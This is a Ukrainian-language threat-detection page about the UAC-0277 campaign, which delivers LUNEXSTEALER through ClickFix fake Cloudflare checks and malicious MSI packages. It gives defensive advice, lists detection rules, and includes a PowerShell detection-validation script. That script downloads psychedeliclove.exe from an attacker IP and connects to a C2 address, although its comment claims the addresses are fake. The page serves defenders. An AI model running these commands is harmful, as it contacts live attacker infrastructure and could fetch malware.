SOC Prime Bias: High

06 Oct 2026 14:30 UTC

Атаки UAC-0277 доставляють LUNEXSTEALER через шкідливі MSI та ClickFix

Author Photo
SOC Prime Team linkedin icon Стежити
Атаки UAC-0277 доставляють LUNEXSTEALER через шкідливі MSI та ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Зловмисні актори, відстежувані як UAC-0277, компрометують легітимні вебсайти для вживлення шкідливого JavaScript, що заманює користувачів виконувати команди через фальшиву сторінку верифікації Cloudflare. Цей метод ClickFix зрештою доставляє пакети MSI, що містять LUNEXSTEALER або додаткові завантажувачі, які використовують BYOVD для уникнення засобів безпеки. Кампанія також використовує інфраструктуру командного та управління на основі блокчейну на Polygon та Ethereum для динамічного управління ресурсами зловмисників.

Розслідування

CERT-UA ідентифікував більше ніж 100 скомпрометованих вебсайтів і проаналізував три варіанти MSI, пов’язаних із кампанією. Дослідники виявили DLL-сторону завантаження із залученням FnHotkeyUtility.exe та експлуатацію вразливого драйвера AMD PDFWKRNL.sys для обходу захисту Windows Defender. Розслідування також виявило розширення браузера LUNARAXE та компонент NAIVEMESS PowerShell, використані для збору та ексфільтрації даних.

Захист

Адміністраторам слід обмежити доступ до діалогу запуску (Win+R) через групові політики та обмежити привілеї установки MSI для авторизованих користувачів. Увімкнення списку блокування вразливих драйверів Microsoft є важливим для зниження ризику атак BYOVD. Організації також повинні впровадити дозволені списки розширень браузера та моніторити підозрілу активність командного рядка msiexec.exe, пов’язану з віддаленими URL.

Відповідь

Коли виявляється підозріла виконання MSI або несанкціоновані розширення браузера, ізолюйте уражений хост і заверште процеси, пов’язані з LUNEXSTEALER. Перевірте заплановані завдання на наявність записів, названих psychedelicloveUtils, і перевірте профілі браузера на наявність розширення Microsoft Office Word Editor. Будь-які виявлені фальшиві сторінки верифікації Cloudflare, пов’язані з кампанією, слід повідомляти до CERT-UA.

Потік атаки

Виявлення

Підозрілі записи RunMRU з семантикою LOLBin (через registry_event)

Команда SOC Prime
05 Жовтня 2026

Можлива спроба віддаленої установки файлу MSI (через cmdline)

Команда SOC Prime
05 Жовтня 2026

Підозріле заплановане завдання (через audit)

Команда SOC Prime
05 Жовтня 2026

Підозріле завантаження файлу через прямий IP (через proxy)

Команда SOC Prime
05 Жовтня 2026

Підозріле командування та контроль через незвичайний запит DNS верхнього рівня (TLD) (через dns)

Команда SOC Prime
05 Жовтня 2026

IOC (HashSha256) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER Частина 2

Правила SOC Prime AI
06 Жовтня 2026

IOC (HashSha256) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER Частина 1

Правила SOC Prime AI
06 Жовтня 2026

IOC (HashMd5) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER Частина 2

Правила SOC Prime AI
06 Жовтня 2026

IOC (HashMd5) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER Частина 1

Правила SOC Prime AI
06 Жовтня 2026

IOC (SourceIP) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER

Правила SOC Prime AI
06 Жовтня 2026

IOC (DestinationIP) для виявлення: Кампанія UAC-0277: Шкідлива розповсюдження MSI через техніку ClickFix та шкідливе програмне забезпечення LUNEXSTEALER

Правила SOC Prime AI
06 Жовтня 2026

Виявлення Взаємодії зі Шкідливими C2 Серверами Використовуючи HTTP та WebSocket [Мережева Підключення Windows]

Правила SOC Prime AI
06 Жовтня 2026

FnHotkeyUtility Виконує Шкідливий spkvol.dll через DLL Стороннє Завантаження [Windows Sysmon]

Правила SOC Prime AI
06 Жовтня 2026

Завантаження Шкідливого Пакету MSI використовуючи Msiexec та Експлуатацію Вразливостей [Створення Процесу Windows]

Правила SOC Prime AI
06 Жовтня 2026

Виявлення Шкідливого JavaScript на Скомпрометованих Вебсайтах [Вебсервер]

Правила SOC Prime AI
06 Жовтня 2026

Виконання Симуляції

  • Наратив Атаки та Команди: Супротивник успішно виконав компрометацію при натисканні. Для встановлення персистенції та завантаження шкідливого програмного забезпечення наступної стадії, імплантований агент намагається отримати файл під назвою psychedeliclove.exe з конкретного URI. Одночасно агент намагається зв’язатися з вторинним вузлом C2, розташованим на 193.178.159.128 на порті 8080 для отримання інструкцій через WebSocket-подібне HTTP з’єднання. Ці специфічні індикатори призначені для того, щоб запускати існуючі правила виявлення на основі проксі.

  • Скрипт Регресійного Тестування:

    # Скрипт Симуляції для Валідації Виявлення
    # Мета: Вивести специфічні URL та IP/Port індикатори в правилі виявлення.
    
    Write-Host "[*] Початок Симуляції..." -ForegroundColor Cyan
    
    # 1. Вибір Тригеру 1: Шаблон Підозрілого URL
    Write-Host "[*] Спроба доступу до шаблону підозрілого URL..." -ForegroundColor Yellow
    try {
        # Ми використовуємо неіснуючий локальний прослуховувач або фальшивий URL, щоб дійсно не звертатися до реального шкідливого сайту, 
        # але проксі все одно повинен зафіксувати спробу запиту.
        Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue
    } catch {
        Write-Host "[!] Запит не вдався (очікувано), але телеметрія повинна бути згенерована." -ForegroundColor Gray
    }
    
    # 2. Вибір Тригеру 2: Специфічний IP та Порт
    Write-Host "[*] Спроба підключення до C2 IP на порту 8080..." -ForegroundColor Yellow
    try {
        $client = New-Object System.Net.Sockets.TcpClient
        $client.Connect("193.178.159.128", 8080)
        $client.Close()
    } catch {
        Write-Host "[!] Підключення не вдалось (очікувано), але журнали проксі повинні зафіксувати спробу." -ForegroundColor Gray
    }
    
    Write-Host "[*] Симуляція завершена." -ForegroundColor Cyan
  • Команди Очищення:

    # Постійні файли не створюються цією симуляцією.
    # Тільки тимчасові мережеві з'єднання намагаються створити.
    Write-Host "[*] Очищення завершено. Артефактів на системі не залишилося." -ForegroundColor Green